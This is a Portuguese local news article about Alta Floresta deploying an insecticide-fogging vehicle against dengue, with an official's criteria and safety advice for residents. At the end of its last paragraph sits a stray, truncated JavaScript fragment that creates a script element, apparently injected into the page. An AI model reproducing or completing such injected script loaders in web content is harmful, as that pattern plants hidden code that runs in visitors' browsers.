Capa / Cidades / Alta Floresta vai utilizar “carro fumacê” para combater a dengue

Alta Floresta vai utilizar “carro fumacê” para combater a dengue

PG_04_FUMACE1Dionéia Martins

Alta Floresta vai contar com um carro “fumacê” com o objetivo de reduzir os diagnósticos de dengue na cidade. O veículo fará a pulverização dos domicílios nos 37 setores do município.
As ações de combate ao vetor transmissor da dengue, zika vírus e febre chikungunya continuam sendo intensificadas, além dos agentes comunitários de saúde, o carro fumacê é mais um reforço no combate ao mosquito Aedes aegypti.
O uso do carro fumacê só é permitido em caso de epidemia, o grande número de focos larvais, justifica o uso desse tipo de controle químico. O inseticida utilizado é distribuído pelo Ministério da Saúde e não pode ser usado com frequência para que o mosquito não crie resistência à fórmula.
“Essa questão do fumacê a gente tem que obedecer alguns critérios, a gente tem que justificar isso com um auto índice de infestação , a notificação no município está alta, isso justifica a necessidade de se fazer o fumacê no município”, justificou o coordenador da Vigilância Epidemiológica Ambiental, Silvio Cardoso.
A pulverização do inseticida será feito em horários estratégicos, isso porque estamos falando de um veneno para eliminar o mosquito Aedes aegypti e outros mosquitos que carregam vírus perigosos. O fumacê passará nas ruas em horário de pouca movimentação, ao anoitecer e ao anoitecer.
“Ele é feito em horário diferente do que é realizado com bombas costais, até pelo fato de que eu não posso fazer isso com um fluxo muito grande de veículos ou pessoas circulando pelas ruas”, explica Silvio.
A população deve seguir algumas regras e cuidados para que a ação do carro fumacê cause efeito. No momento em que ele estiver na rua, todos devem abrir as portas e as janelas para que o inseticida dispensado no ar possa circular dentro das casas, eliminando o maior número possível de mosquitos da dengue.
Outra recomendação é para que não fique transitando na rua principalmente as crianças. Os pais devem tomar o cuidado para não deixar as crianças brincarem atrás do carro, o produto é tóxico e se o contato com o inseticida for longo pode causar intoxicação, outro risco é se a pessoa for alérgica ao produto.
“A criança quando ver alguma coisa diferente na rua, um veículo tem aquele costume de acompanha e ficar muito próximo, peço as mães e pais, que tem criança pequena, quando o veículo estiver no seu bairro não deixe que a criança fique pela rua”, recomenda.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top